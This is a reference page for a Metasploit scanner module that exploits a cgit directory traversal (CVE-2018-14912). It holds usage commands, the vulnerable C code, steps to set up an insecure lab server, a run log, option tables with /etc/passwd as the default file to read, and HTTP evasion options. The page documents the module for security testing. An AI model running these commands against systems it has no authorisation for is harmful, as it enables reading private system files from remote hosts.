cgit Directory Traversal - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/http/cgit_traversal metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: cgit Directory Traversal
Module: auxiliary/scanner/http/cgit_traversal
Source code: modules/auxiliary/scanner/http/cgit_traversal.rb
Disclosure date: 2018-08-03
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2018-14912

This module exploits a directory traversal vulnerability which exists in cgit < 1.2.1 cgit_clone_objects(), reachable when the configuration flag enable-http-clone is set to 1 (default).

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/http/cgit_traversal
msf auxiliary(cgit_traversal) > show options
    ... show and set options ...
msf auxiliary(cgit_traversal) > set RHOSTS ip-range
msf auxiliary(cgit_traversal) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(cgit_traversal) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(cgit_traversal) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(cgit_traversal) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


cgit before v1.2.1 has a directory traversal vulnerabiltiy when cgitrc has the enable-http-clone value set to 1. The directory traversal can be used to download files from the remote host. This module has been tested against cgit v1.1 running on Ubuntu 18.04.

Vulnerable Application


cgit before v1.2.1

Installing cgit on Ubuntu 18.04 x64

  1. sudo apt install cgit # dependencies may have to be downloaded first
  2. Modify /etc/cgitrc to have enable-http-clone=1. Example attached.
  3. Add .htaccess file with rewrite rules to /usr/lib/cgit/. Example attached.
  4. Add cgit.conf to /etc/apache2/conf-enabled/. Example attached.
  5. Enable rewrite.load and cgi.load in apache2.
  6. Create bare repo. mkdir -p repo/test.git && cd repo/test.git && git init --bare

Example files were only used for testing and are not secure or usable in non-testing environments. These WILL make your system insecure, but will enable exploitation by this module.

cgit.conf

cgitrc

.htaccess

Vulnerability Details from Project Zero

There is a directory traversal vulnerability in cgit_clone_objects(), reachable when the configuration flag enable-http-clone is set to 1 (default):

void cgit_clone_objects(void)
{
    if (!ctx.qry.path) {
        cgit_print_error_page(400, "Bad request", "Bad request");
        return;
    }

    if (!strcmp(ctx.qry.path, "info/packs")) {
        print_pack_info();
        return;
    }

    send_file(git_path("objects/%s", ctx.qry.path));
}

send_file() is a function that simply sends the data stored at the given filesystem path out over the network. git_path() partially rewrites the provided path and e.g. prepends the base path of the repository, but it does not sanitize the provided path to prevent directory traversal.

ctx.qry.path can come from querystring_cb(), which takes unescaped data from the querystring.

Options


REPO

Git repository on the remote server. Default is empty, ''.

Verification Steps


  1. ./msfconsole -q
  2. set rhosts <rhost>
  3. set targeturi <uri>
  4. set repo <repo>
  5. run

Scenarios


Ubuntu 18.04 x64, cgit | 1.1+git2.10.2-3build1

msf5 > use auxiliary/scanner/http/cgit_traversal
msf5 auxiliary(scanner/http/cgit_traversal) > set rhosts 172.22.222.123
rhosts => 172.22.222.123
msf5 auxiliary(scanner/http/cgit_traversal) > set targeturi /mygit/
targeturi => /mygit/
msf5 auxiliary(scanner/http/cgit_traversal) > set repo test
repo => test
msf5 auxiliary(scanner/http/cgit_traversal) > set filepath /home/msfdev/proof.txt
filepath => /home/msfdev/proof.txt
msf5 auxiliary(scanner/http/cgit_traversal) > set verbose true
verbose => true
msf5 auxiliary(scanner/http/cgit_traversal) > run

[+] 172.22.222.123:80     - 
you found me!

[+] File saved in: /home/msfdev/.msf4/loot/20180813150517_default_172.22.222.123_cgit.traversal_235024.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Go back to menu.

Msfconsole Usage


Here is how the scanner/http/cgit_traversal auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/http/cgit_traversal

msf6 auxiliary(scanner/http/cgit_traversal) > show info

       Name: cgit Directory Traversal
     Module: auxiliary/scanner/http/cgit_traversal
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2018-08-03

Provided by:
  Google Project Zero
  Dhiraj Mishra

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  DEPTH      10               yes       Depth for Path Traversal
  FILEPATH   /etc/passwd      yes       The path to the file to read
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  REPO                        yes       Git repository on the remote server
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /cgit/           yes       The base URI path of the cgit install
  THREADS    1                yes       The number of concurrent threads (max one per host)
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a directory traversal vulnerability which 
  exists in cgit < 1.2.1 cgit_clone_objects(), reachable when the 
  configuration flag enable-http-clone is set to 1 (default).

References:
  https://nvd.nist.gov/vuln/detail/CVE-2018-14912
  https://bugs.chromium.org/p/project-zero/issues/detail?id=1627
  https://www.exploit-db.com/exploits/45148

Module Options


This is a complete list of options available in the scanner/http/cgit_traversal auxiliary module:

msf6 auxiliary(scanner/http/cgit_traversal) > show options

Module options (auxiliary/scanner/http/cgit_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      10               yes       Depth for Path Traversal
   FILEPATH   /etc/passwd      yes       The path to the file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   REPO                        yes       Git repository on the remote server
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /cgit/           yes       The base URI path of the cgit install
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the scanner/http/cgit_traversal auxiliary module:

msf6 auxiliary(scanner/http/cgit_traversal) > show advanced

Module advanced options (auxiliary/scanner/http/cgit_traversal):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true                                                yes       Display progress messages during a scan
   ShowProgressPercent   10                                                  yes       The interval in percent that progress should be shown
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/http/cgit_traversal module can do:

msf6 auxiliary(scanner/http/cgit_traversal) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/http/cgit_traversal auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/http/cgit_traversal) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Nothing was downloaded


Here is a relevant code snippet related to the "Nothing was downloaded" error message:

49:	      'uri'    => normalize_uri(target_uri.path, datastore['REPO'], '/objects/'),
50:	      'vars_get' => {'path' => traversal}
51:	    })
52:	
53:	    unless res && res.code == 200
54:	      print_error('Nothing was downloaded')
55:	      return
56:	    end
57:	
58:	    vprint_good("#{peer} - \n#{res.body}")
59:	    path = store_loot(

Go back to menu.


References


Authors


  • Google Project Zero
  • Dhiraj Mishra

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.